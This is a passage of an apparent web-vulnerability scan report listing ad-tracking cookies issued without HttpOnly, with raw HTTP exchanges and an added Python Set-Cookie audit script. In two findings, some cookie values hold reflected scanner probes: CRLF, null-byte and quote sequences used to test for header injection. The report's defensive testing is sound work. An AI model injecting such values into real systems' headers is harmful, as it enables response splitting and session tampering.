P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:42:17 GMT
Content-Length: 820

/* AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC) */
rsinetsegs=['J06575_10396','J06575_50240','J06575_50735','J06575_50778','J06575_50892'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
va
...[SNIP]...

14.73. http://pixel.quantserve.com/pixel/p-61YFdB4e9hBRs.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel/p-61YFdB4e9hBRs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/p-61YFdB4e9hBRs.gif?labels=741%2e2269%2e55541%2e300x250&media=apl&idmatch=0 HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4e5e6725-891ad-f8693-5137e; d=ENMBHQHQB4FQDds0ggi_ELqlAA

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: d=EMEBBgHQBw; expires=Sat, 03-Dec-2011 01:05:08 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Content-Type: image/gif
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 35
Date: Sun, 04 Sep 2011 01:05:08 GMT
Server: QS

GIF89a.......,.................D..;

14.74. http://pixel.rubiconproject.com/tap.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=4210&nid=1523&put=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F&expires=10 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=6291/9346
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; ruid=154e62c97432177b6a4bcd01^1^1315096948^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=5032^1&9346^1; csi2=3214995.js^2^1315096957^1315097051; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; rdk=6291/9346; rdk15=0; ses15=5032^1&9346^1; csi15=3203911.js^1^1315097079^1315097079; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:44:46 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1; expires=Tue, 04-Oct-2011 00:44:46 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C0%2C1%2C%2C; expires=Tue, 04-Oct-2011 00:44:46 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; expires=Wed, 14-Sep-2011 00:44:46 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

14.75. http://pixel.rubiconproject.com/tap.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=5364&nid=2046&put=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=6291/9346
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; ruid=154e62c97432177b6a4bcd01^1^1315096948^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=5032^1&9346^1; csi2=3214995.js^2^1315096957^1315097051; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%265364%3D1%267751%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C0%2C1%2C%2C%267751%3D14656%2C0%2C1%2C%2C; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; rdk=6291/9346; rdk15=0; ses15=5032^1&9346^1; csi15=3203911.js^1^1315097079^1315097079

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:07:13 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1; expires=Tue, 04-Oct-2011 01:07:13 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C4%2C2%2C%2C%267751%3D14657%2C0%2C65%2C%2C; expires=Tue, 04-Oct-2011 01:07:13 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; expires=Tue, 04-Oct-2011 01:07:13 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

14.76. http://pixel.rubiconproject.com/tap.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=4212&nid=1185&put=2925993182975414771&expires=60 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&rnd=3553767842307670945&fpid=6&nu=n&t=&sp=y&purl=&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; ruid=154e62c97432177b6a4bcd01^1^1315096948^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=5032^1&9346^1; csi2=3214995.js^2^1315096957^1315097051; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; rdk=6291/9346; rdk15=0; ses15=5032^1&9346^1; csi15=3203911.js^1^1315097079^1315097079; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:08:20 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%2624831%0D%0A4e77fd0dd5f%3D1%2684555%250d%250a76073097ace%3D1%261e49b%00%0D%0A021fe9e2610%3D1%265364e6226%0D%0A20a447c6f1a%3D1%26536489345%250d%250a30a7789986a%3D1%265364c2fb0%00%0D%0Aef4d9f296de%3D1%265364%27%3D1%265364%2527%3D1%265364%00%27%3D1%265364%22%3D1%265364%3D1%264212%3D1; expires=Tue, 04-Oct-2011 01:08:20 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C4%2C29%2C%2C%267751%3D14656%2C0%2C1%2C%2C6069c2e8bf59d5d46e70329b%2624831%0D%0A4e77fd0dd5f%3D14657%2C0%2C1%2C%2C%2684555%250d%250a76073097ace%3D14657%2C0%2C1%2C%2C%261e49b%00%0D%0A021fe9e2610%3D14657%2C0%2C1%2C%2C%265364e6226%0D%0A20a447c6f1a%3D14657%2C0%2C1%2C%2C%26536489345%250d%250a30a7789986a%3D14657%2C0%2C1%2C%2C%265364c2fb0%00%0D%0Aef4d9f296de%3D14657%2C0%2C1%2C%2C%265364%27%3D14657%2C0%2C1%2C%2C%265364%2527%3D14657%2C0%2C1%2C%2C%265364%00%27%3D14657%2C0%2C1%2C%2C%265364%22%3D14657%2C0%2C1%2C%2C%264212%3D14657%2C0%2C1%2C%2C; expires=Tue, 04-Oct-2011 01:08:20 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_1185=2925993182975414771; expires=Thu, 03-Nov-2011 01:08:20 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

14.77. http://pixel.rubiconproject.com/tap.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=7751&nid=2249&expires=30&put=CAESEGMUSetziKiEuzwBhcLJxAU&google_cver=1 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html?rtb_ext=1&pc=6291/9346
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; rpb=7908%3D1%264940%3D1%265364%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C0%2C1%2C%2C; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; ruid=154e62c97432177b6a4bcd01^1^1315096948^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses15=5032^1; rdk=6291/9346; rdk2=0; ses2=5032^1&9346^1; csi2=3214995.js^2^1315096957^1315097051

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:03:09 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%2663ab8%0D%0A01bb4e98c34%3D1%262f3e7%250d%250abefce76579c%3D1%26658e0%00%0D%0A6b8eb56a945%3D1%264210330d2%0D%0A8b1ecee0312%3D1%26421091ced%250d%250af3ebd5f25d3%3D1%264210aa2c8%00%0D%0A9382c866592%3D1%264210%27%3D1%264210%2527%3D1%264210%00%27%3D1%264210%22%3D1%264210%3D1%267751%3D1; expires=Tue, 04-Oct-2011 01:03:09 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C0%2C1%2C%2C6069c2e85f977687d81d3d36%264210%3D14657%2C0%2C32%2C%2C%2663ab8%0D%0A01bb4e98c34%3D14657%2C0%2C1%2C%2C%262f3e7%250d%250abefce76579c%3D14657%2C0%2C1%2C%2C%26658e0%00%0D%0A6b8eb56a945%3D14657%2C0%2C1%2C%2C%264210330d2%0D%0A8b1ecee0312%3D14657%2C0%2C1%2C%2C%26421091ced%250d%250af3ebd5f25d3%3D14657%2C0%2C1%2C%2C%264210aa2c8%00%0D%0A9382c866592%3D14657%2C0%2C1%2C%2C%264210%27%3D14657%2C0%2C1%2C%2C%264210%2527%3D14657%2C0%2C1%2C%2C%264210%00%27%3D14657%2C0%2C1%2C%2C%264210%22%3D14657%2C0%2C1%2C%2C%267751%3D14657%2C0%2C1%2C%2C; expires=Tue, 04-Oct-2011 01:03:09 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; expires=Tue, 04-Oct-2011 01:03:09 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

14.78. http://r.openx.net/set

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.openx.net
Path:   /set

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set HTTP/1.1
Host: r.openx.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:23:25 GMT
Server: Apache
Cache-Control: public, max-age=30, proxy-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: i=4e28a2c0-3fbe-4680-b440-7249a1d4d410; expires=Tue, 03-Sep-2013 01:23:25 GMT; path=/; domain=.openx.net
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.79. http://r.turn.com/server/pixel.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /server/pixel.htm?fpid=4&sp=y&admeld_call_type=iframe&admeld_user_id=14c82149-9fc3-4277-af4b-df6e89b3fc47&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=2925993182975414771

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3033228098597162936; Domain=.turn.com; Expires=Fri, 02-Mar-2012 01:06:01 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:06:00 GMT
Content-Length: 342

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3033228098597162936&rnd=3093449532631709493&fpid=4&nu=n&t=
...[SNIP]...
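Added example (not part of the XSS.CX/Burp output above, and not code from any of the scanned sites): the check behind findings 14.79 to 14.97, reproduced in Python. It splits each Set-Cookie header the way RFC 6265 section 5.2 does, flags the missing HttpOnly attribute and, going beyond what this report rates, also reports a missing Secure or SameSite attribute, a name-based guess at whether the cookie is a session token (which is what separates the report's "Information" rating from the "Low" it gives session cookies), and the cookie lifetime relative to the scan date. The sample headers are the Set-Cookie values from the responses in 14.79 through 14.83; the hardened "sessionid" header, the SCAN_TIME constant and the session-name heuristic are assumptions made for illustration.

```python
"""Set-Cookie audit: flag cookies issued without HttpOnly (and Secure/SameSite).

Added example for this section of the report; it is not part of the original
scan output or of any scanned site's code. The sample headers are the
Set-Cookie values captured in findings 14.79 to 14.83; the last, hardened
header and the session-token heuristic are assumptions made for illustration.
"""
import re
from dataclasses import dataclass, field
from datetime import datetime, timezone

# Constructed sample input: Set-Cookie header values as they appear on the page.
SAMPLE_SET_COOKIES = [
    "uid=3033228098597162936; Domain=.turn.com; Expires=Fri, 02-Mar-2012 01:06:01 GMT; Path=/",
    "lgtix=BgABADMBSQABADMBHAACADMBDAABADMB/QABADABXwABADMB; path=/; "
    "expires=Wed, 03 Sep 2014 00:48:45 GMT; domain=.legolas-media.com",
    'audienceData="{\\"v\\":2,\\"providers\\":{\\"8\\":{\\"f\\":1317538800}}}";'
    "Path=/;Domain=.adap.tv;Expires=Wed, 13-May-2043 02:31:30 GMT",
    "usatprod=R1449690983; path=/",
    # Hypothetical hardened header (not on the page), for contrast.
    "sessionid=0123456789abcdef; Path=/; Secure; HttpOnly; SameSite=Lax",
]

# Assumed reference "now" for lifetime calculations: the scan's own response Date.
SCAN_TIME = datetime(2011, 9, 4, 1, 6, 0, tzinfo=timezone.utc)

# Name fragments that suggest a session/authentication cookie (heuristic, assumed).
SESSION_NAME_HINTS = ("sess", "sid", "auth", "token", "login")

_MONTHS = {m: i for i, m in enumerate(
    "jan feb mar apr may jun jul aug sep oct nov dec".split(), start=1)}
# Matches both "02-Mar-2012 01:06:01" and "03 Sep 2014 00:48:45".
_EXPIRES_RE = re.compile(r"(\d{1,2})[ -]([A-Za-z]{3})[ -](\d{4}) (\d\d):(\d\d):(\d\d)")


@dataclass
class Cookie:
    name: str
    value: str
    # attribute name (lower-cased) -> value, or True for bare flags such as HttpOnly
    attrs: dict = field(default_factory=dict)


def parse_set_cookie(header: str) -> Cookie:
    """Split a Set-Cookie value per RFC 6265 s5.2: name=value, then ';'-separated attributes.

    A cookie value may be wrapped in double quotes but can never contain ';',
    so splitting on ';' first is safe even for the JSON-bearing audienceData cookie.
    """
    pieces = header.split(";")
    name, sep, value = pieces[0].partition("=")
    if not sep or not name.strip():
        raise ValueError(f"no name=value pair in {header!r}")
    cookie = Cookie(name.strip(), value.strip())
    for piece in pieces[1:]:
        piece = piece.strip()
        if not piece:
            continue
        key, sep, val = piece.partition("=")
        cookie.attrs[key.strip().lower()] = val.strip() if sep else True
    return cookie


def parse_expires(text: str):
    """Return a UTC datetime for an Expires attribute, or None if it cannot be parsed."""
    m = _EXPIRES_RE.search(text)
    if not m:
        return None
    day, mon, year, hh, mm, ss = m.groups()
    return datetime(int(year), _MONTHS[mon.lower()], int(day),
                    int(hh), int(mm), int(ss), tzinfo=timezone.utc)


def looks_like_session_token(cookie: Cookie) -> bool:
    """Heuristic: the cookie name hints at a session or authentication token."""
    name = cookie.name.lower()
    return any(hint in name for hint in SESSION_NAME_HINTS)


def audit_cookie(header: str) -> dict:
    """Report missing protective attributes and a report-style severity for one header."""
    c = parse_set_cookie(header)
    issues = [f"missing {flag}" for flag in ("HttpOnly", "Secure", "SameSite")
              if flag.lower() not in c.attrs]
    raw_expires = c.attrs.get("expires")
    expires = parse_expires(raw_expires) if isinstance(raw_expires, str) else None
    lifetime_days = (expires - SCAN_TIME).days if expires else None
    session_like = looks_like_session_token(c)
    if not issues:
        severity = None
    elif session_like:
        severity = "Low"          # a script-readable session token is the real risk
    else:
        severity = "Information"  # the rating this report gives non-session cookies
    return {"name": c.name, "issues": issues, "session_like": session_like,
            "lifetime_days": lifetime_days, "severity": severity}


def audit_all(headers) -> dict:
    """Audit every header; returns {cookie name: result dict}."""
    return {r["name"]: r for r in map(audit_cookie, headers)}


if __name__ == "__main__":
    for name, r in audit_all(SAMPLE_SET_COOKIES).items():
        rating = r["severity"] or "ok"
        problems = ", ".join(r["issues"]) or "-"
        print(f"{name:14} {rating:12} {problems}  lifetime={r['lifetime_days']}d")
```

Run as a script it prints one line per cookie; the audienceData cookie shows a lifetime of more than thirty years, which is the kind of detail worth pulling into a finding alongside the missing flag. The session-name heuristic is deliberately crude: it is only there to reproduce the "does not appear to contain a session token" decision in the issue detail, and any real review should inspect the cookie's use, as the report itself advises.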

14.80. http://rt.legolas-media.com/lgrt

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rt.legolas-media.com
Path:   /lgrt

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

lgtix

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lgrt?ci=2&ei=9&ti=28&pbi=37 HTTP/1.1
Host: rt.legolas-media.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ui=5ea31fa9-d42d-458f-9bb4-1700d69738c0; lgtix=/QABADAB

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:48:45 GMT
Server: Apache
Expires: -1
Cache-Control: no-cache; no-store
Content-Type: application/javascript
Set-Cookie: lgtix=BgABADMBSQABADMBHAACADMBDAABADMB/QABADABXwABADMB; path=/; expires=Wed, 03 Sep 2014 00:48:45 GMT; domain=.legolas-media.com
P3P: policyref="http://www.legolas-media.com/w3c/p3p.xml",CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Length: 5
Connection: close

true;

14.81. http://segments.adap.tv/data

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segments.adap.tv
Path:   /data

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

audienceData

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /data?p=quantcast-lal&type=gif&segment=D,T&add=true HTTP/1.1
Host: segments.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"; adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+17%3A44%3A46"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Content-Type: image/gif
Connection: Keep-Alive
Set-Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]},\"42\":{\"f\":1317625200,\"e\":1317625200,\"s\":[],\"a\":[]}}}";Path=/;Domain=.adap.tv;Expires=Wed, 13-May-2043 02:31:30 GMT
Content-Length: 42

GIF89a.............!.......,...........D.;

14.82. http://segments.adap.tv/data/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segments.adap.tv
Path:   /data/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

audienceData

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /data/?p=brilig&type=gif&add=true HTTP/1.1
Host: segments.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"; adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+17%3A44%3A46"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Content-Type: image/gif
Connection: Keep-Alive
Set-Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]},\"2\":{\"f\":1317625200,\"e\":1317625200,\"s\":[],\"a\":[]},\"20\":{\"f\":1317625200,\"e\":1317625200,\"s\":[],\"a\":[]},\"41\":{\"f\":1317625200,\"e\":1317625200,\"s\":[],\"a\":[]}}}";Path=/;Domain=.adap.tv;Expires=Wed, 13-May-2043 03:00:43 GMT
Content-Length: 42

GIF89a.............!.......,...........D.;

14.83. http://sitelife.usatoday.com/ver1.0/Content/images/no-user-image.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/Content/images/no-user-image.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

usatprod

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/Content/images/no-user-image.gif HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_lastvisit=1315096975071; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; s_pv=usat%20%3A%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=J06575_10396; SiteLifeHost=gnvm3l3pluckcom; anonId=95a33e61-cab8-41e8-8a05-66c2a9a0ee5a; usatprod=R1449690983; USATINFO=Handle%3D

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449690983; path=/
Content-Length: 498
Content-Type: image/gif
